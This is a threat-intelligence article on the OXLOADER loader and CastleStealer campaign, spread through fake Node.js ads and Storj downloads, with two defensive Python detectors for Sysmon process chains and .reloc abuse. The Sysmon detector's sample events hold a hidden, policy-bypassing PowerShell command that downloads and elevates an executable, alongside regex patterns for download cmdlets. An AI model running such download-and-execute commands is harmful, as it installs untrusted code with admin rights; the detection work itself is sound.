Cybersecurity researchers have identified a new malware distribution campaign that uses fraudulent Google advertisements to deliver CastleStealer through a previously undocumented malware loader known as OXLOADER. The campaign, tracked by Elastic Security Labs under the designation REF8372, highlights the continued use of online advertising platforms as an entry point for malware infections. Researchers believe the operation is financially motivated and likely linked to Russian-speaking threat actors, citing explicit safeguards within the malware that prevent it from infecting systems located in Commonwealth of Independent States (CIS) countries. The campaign combines social engineering, abuse of legitimate cloud services, and advanced malware development techniques aimed at avoiding detection and extending the operation's lifespan. According to Elastic Security Labs researchers Daniel Stepanic and Jia Yu Chan, OXLOADER incorporates multiple layers of code obfuscation, self-modifying decryption routines, and unconventional methods for executing shellcode, making analysis and detection significantly more difficult.
The attack chain begins when users search for terms such as "lts version of node.js" and are shown malicious advertisements that redirect them to a fraudulent website designed to resemble a legitimate software download page. Investigators found that one of the fake domains used in the operation was node-js[.]prentiva99[.]info, which was promoted through advertisements published under the verified advertiser name "ВОЛОДИМИР ТЕРЕЩЕНКО," reportedly associated with Ukraine. Researchers have not determined whether this advertiser account belonged to the threat actors, was compromised, or was acquired specifically for the campaign. Google removed the advertiser account and its associated advertising campaigns on May 14, 2026. Visitors who interact with the deceptive website are prompted to download a batch script hosted on Storj, a decentralized cloud storage platform. The use of Storj illustrates how threat actors continue to exploit trusted, legitimate online services to bypass domain-reputation-based security controls and avoid raising suspicion among potential victims.
Executing the downloaded batch script presents the user with a fake software installation wizard while silently initiating the next stage of the infection. In the background, a PowerShell command retrieves an executable hosted on Storj that serves as the OXLOADER payload. The loader is then launched through a Windows User Account Control (UAC) elevation prompt, so that once the user consents it runs with administrative privileges and can carry out actions a standard-integrity process could not. Researchers observed that OXLOADER relies on DLL side-loading to execute a malicious dynamic-link library, which subsequently decrypts and launches CastleStealer. The loader employs evasion methods including control-flow flattening, mixed Boolean arithmetic, self-modifying code, and anti-virtual-machine checks intended to hinder security analysis and reduce detection rates. Elastic Security Labs noted that OXLOADER also abuses the .reloc section of the PE file, which normally holds only base-relocation data, to stage shellcode, a technique not commonly observed in mainstream malware campaigns and one that reflects a deliberate effort to complicate reverse engineering.
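The delivery chain described in the two paragraphs above (batch script, hidden PowerShell download from Storj, UAC-elevated launch of the dropped executable) is easy to state as a process-tree correlation. The following is an added example, not Elastic's detection logic and not code from the page: it runs a rule over constructed Sysmon-style process-creation events (EventID 1 with Image, CommandLine, ParentProcessId and IntegrityLevel, which are real Sysmon fields; the values themselves are made up). The Storj host pattern (storjshare.io), the user-writable path list and the download cmdlet list are assumptions that a defender would tune to their own telemetry.

```python
"""Process-tree detection for the batch -> PowerShell -> elevated-loader chain (added example)."""
import re
from dataclasses import dataclass

# Assumption: a PowerShell download is any of these cmdlets/methods on the command line.
DOWNLOAD_CMDLETS = re.compile(
    r"(Invoke-WebRequest|\biwr\b|Invoke-RestMethod|DownloadFile|Start-BitsTransfer)", re.I)
# Assumption: Storj public gateway/link host names; extend with what you actually observe.
STORJ_HOSTS = re.compile(r"https?://[^\s\"']*storjshare\.io", re.I)
# Assumption: locations a standard user can write to; an elevated image there is worth a look.
USER_WRITABLE = re.compile(r"^C:\\Users\\[^\\]+\\(Downloads|AppData|Desktop)\\", re.I)


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str
    integrity: str
    time: str


def parse_events(events: list[dict]) -> dict[int, Proc]:
    """Index Sysmon EventID 1 records by ProcessId."""
    return {int(e["ProcessId"]): Proc(int(e["ProcessId"]), int(e["ParentProcessId"]), e["Image"],
                                       e["CommandLine"], e["IntegrityLevel"], e["UtcTime"])
            for e in events if int(e["EventID"]) == 1}


def ancestors(procs: dict[int, Proc], pid: int) -> list[Proc]:
    """Walk the parent chain (including pid itself); guards against PID reuse loops."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid])
        pid = procs[pid].ppid
    return chain


def detect(events: list[dict]) -> list[dict]:
    """Score each PowerShell instance that downloads from Storj by how much of the chain is present."""
    procs = parse_events(events)
    hits = []
    for ps in procs.values():
        if not ps.image.lower().endswith("\\powershell.exe"):
            continue
        if not (DOWNLOAD_CMDLETS.search(ps.cmdline) and STORJ_HOSTS.search(ps.cmdline)):
            continue
        # File names the command line mentions; the elevated stage usually reuses one of them.
        dropped = {m.lower() for m in re.findall(r"[\w.-]+\.exe", ps.cmdline)}
        parent = procs.get(ps.ppid)
        from_batch = bool(parent and parent.image.lower().endswith("\\cmd.exe")
                          and re.search(r"\.(bat|cmd)\b", parent.cmdline, re.I))
        elevated = [q for q in procs.values()
                    if q.integrity.lower() == "high" and USER_WRITABLE.match(q.image)
                    and (any(a.pid == ps.pid for a in ancestors(procs, q.pid))
                         or q.image.rsplit("\\", 1)[-1].lower() in dropped)]
        hits.append({"pid": ps.pid, "from_batch": from_batch,
                     "elevated_pids": [q.pid for q in elevated],
                     "score": 1 + int(from_batch) + int(bool(elevated))})
    return hits


TEMP_EXE = r"C:\Users\alice\AppData\Local\Temp\node-runtime.exe"
# Constructed Sysmon-like events: one malicious chain plus two benign processes.
SAMPLE_EVENTS = [
    {"EventID": 1, "UtcTime": "2026-05-13 09:00:01", "ProcessId": 2000, "ParentProcessId": 1000,
     "Image": r"C:\Windows\System32\cmd.exe", "IntegrityLevel": "Medium",
     "CommandLine": r'C:\Windows\System32\cmd.exe /c ""C:\Users\alice\Downloads\node-v22-lts-setup.bat""'},
    {"EventID": 1, "UtcTime": "2026-05-13 09:00:02", "ProcessId": 3000, "ParentProcessId": 2000,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "IntegrityLevel": "Medium",
     "CommandLine": "powershell.exe -w hidden -ep bypass -c \"Invoke-WebRequest "
                    "'https://link.storjshare.io/raw/abc123/setup/node-runtime.exe' -OutFile "
                    + TEMP_EXE + "; Start-Process " + TEMP_EXE + " -Verb RunAs\""},
    {"EventID": 1, "UtcTime": "2026-05-13 09:00:09", "ProcessId": 4000, "ParentProcessId": 3000,
     "Image": TEMP_EXE, "IntegrityLevel": "High", "CommandLine": TEMP_EXE},
    {"EventID": 1, "UtcTime": "2026-05-13 09:05:00", "ProcessId": 5000, "ParentProcessId": 1000,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "IntegrityLevel": "Medium",
     "CommandLine": "powershell.exe -c \"Invoke-WebRequest https://aka.ms/vscode -OutFile vscode.zip\""},
    {"EventID": 1, "UtcTime": "2026-05-13 09:06:00", "ProcessId": 6000, "ParentProcessId": 1000,
     "Image": r"C:\Users\alice\Downloads\VSCodeSetup.exe", "IntegrityLevel": "High",
     "CommandLine": r"C:\Users\alice\Downloads\VSCodeSetup.exe"},
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

A score of 3 means all three stages were seen; a lone Storj download (score 1) is still worth an alert but deserves a lower severity, since Storj also hosts legitimate content. The elevated-stage match relies on either process ancestry or the file name reused from the download command, so it still fires when the UAC-elevated process is not recorded as a direct child of the PowerShell instance.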
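The .reloc abuse noted above is also a cheap triage signal, because a genuine base-relocation table has a rigid structure that a shellcode blob will not satisfy. The following is an added example (not Elastic's code and not from the page) that pulls the .reloc section out of a PE file by walking the section table, then checks that it parses as a sequence of IMAGE_BASE_RELOCATION blocks (page-aligned PageRVA, plausible SizeOfBlock, only ABSOLUTE/HIGHLOW/DIR64 entry types, zero padding after the last block) and measures its entropy. The minimal PE fixture, the clean relocation block and the pseudo-random stand-in for an encrypted payload are all constructed for the demonstration; the 7.0 entropy threshold is an assumption.

```python
"""Structural sanity check of a PE .reloc section (added example)."""
import math
import random
import struct
from collections import Counter

ALLOWED_TYPES = {0, 3, 10}  # IMAGE_REL_BASED_ABSOLUTE (padding), HIGHLOW, DIR64
ENTROPY_LIMIT = 7.0          # assumption: encrypted/packed blobs sit near 8 bits per byte


def shannon_entropy(data: bytes) -> float:
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def walk_reloc_blocks(data: bytes) -> dict:
    """Walk IMAGE_BASE_RELOCATION blocks: PageRVA, SizeOfBlock, then 16-bit type:offset entries."""
    problems, blocks, entries, off = [], 0, 0, 0
    while off + 8 <= len(data):
        page_rva, size = struct.unpack_from("<II", data, off)
        if size == 0:
            break  # linkers zero-pad the section tail; an empty header ends the table
        if size < 8 or size % 2 or off + size > len(data):
            problems.append(f"block@{off:#x}: implausible SizeOfBlock {size}")
            break
        if page_rva & 0xFFF:
            problems.append(f"block@{off:#x}: PageRVA {page_rva:#x} is not page-aligned")
        for i in range(off + 8, off + size, 2):
            rtype = struct.unpack_from("<H", data, i)[0] >> 12
            if rtype not in ALLOWED_TYPES:
                problems.append(f"block@{off:#x}: unexpected relocation type {rtype}")
                break
            entries += 1
        blocks, off = blocks + 1, off + size
    if any(data[off:]):
        problems.append(f"{len(data) - off} non-zero bytes after the last block")
    return {"blocks": blocks, "entries": entries, "entropy": shannon_entropy(data), "problems": problems}


def find_section(pe: bytes, name: bytes) -> bytes | None:
    """Return a section's raw file bytes by walking the PE section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad NT signature")
    coff = e_lfanew + 4
    nsec = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size
    for i in range(nsec):
        sname, _vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, table + 40 * i)
        if sname.rstrip(b"\0") == name:
            return pe[raw_ptr:raw_ptr + raw_size]
    return None


def assess_reloc(pe: bytes) -> dict:
    """Missing .reloc is normal (many EXEs have none); a malformed or high-entropy one is not."""
    data = find_section(pe, b".reloc")
    if data is None:
        return {"suspicious": False, "reason": "no .reloc section"}
    stats = walk_reloc_blocks(data)
    stats["suspicious"] = bool(stats["problems"]) or stats["entropy"] > ENTROPY_LIMIT
    return stats


def build_min_pe(sections: list[tuple[bytes, bytes]]) -> bytes:
    """Constructed fixture: DOS header, NT headers with an empty optional header, section table,
    raw data. Not loadable by Windows, just enough for find_section() to parse."""
    nsec = len(sections)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", 0x8664, nsec, 0, 0, 0, 0, 0x22)
    table, raw, ptr = b"", b"", 0x40 + 4 + 20 + 40 * nsec
    for i, (name, data) in enumerate(sections):
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(data), 0x1000 * (i + 1),
                             len(data), ptr, 0, 0, 0, 0, 0x40000040)
        raw, ptr = raw + data, ptr + len(data)
    return dos + b"PE\0\0" + coff + table + raw


def reloc_block(page_rva: int, offsets: list[int], rtype: int = 10) -> bytes:
    """One well-formed IMAGE_BASE_RELOCATION block (constructed)."""
    body = b"".join(struct.pack("<H", (rtype << 12) | o) for o in offsets)
    if len(body) % 4:
        body += b"\0\0"  # ABSOLUTE entry keeps the block 4-byte aligned, as linkers do
    return struct.pack("<II", page_rva, 8 + len(body)) + body


CLEAN_PE = build_min_pe([(b".text", b"\xcc" * 64),
                         (b".reloc", reloc_block(0x1000, [0x10, 0x28, 0x40, 0x58]) + b"\0" * 8)])
# Stand-in for an encrypted blob parked in .reloc: deterministic pseudo-random bytes, not real shellcode.
ABUSED_PE = build_min_pe([(b".text", b"\xcc" * 64), (b".reloc", random.Random(8372).randbytes(512))])

if __name__ == "__main__":
    for label, pe in (("clean", CLEAN_PE), ("abused", ABUSED_PE)):
        print(label, assess_reloc(pe))
```

On a real sample, read the file with `open(path, "rb").read()` and pass it to `assess_reloc`. Raw (unencrypted) shellcode may score below the entropy limit, which is why the structural walk is the primary check: almost any 16-bit values outside the 0x0xxx/0x3xxx/0xAxxx pattern, or a SizeOfBlock that runs past the section, end the walk with a recorded problem.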
CastleStealer itself is a .NET-based information stealer designed to harvest sensitive user data and credentials from compromised systems. Researchers recently observed the malware being distributed alongside CastleLoader in a separate campaign known as BackgroundFix, which used a ClickFix-style lure disguised as a free image editing application. CastleLoader has previously been associated with a threat activity cluster tracked as GrayBravo. Elastic Security Labs stated that while OXLOADER appears to be in the early stages of deployment, its architecture and implementation indicate a significant investment in development and operational security. The combination of layered obfuscation, anti-analysis mechanisms, benign-looking code structures, and unusual staging methods has resulted in low detection rates across many security engines and automated malware analysis environments. These characteristics give threat actors a window in which to distribute malware and collect information before defensive measures adapt, making OXLOADER a malware family that security researchers and enterprise defenders are monitoring closely.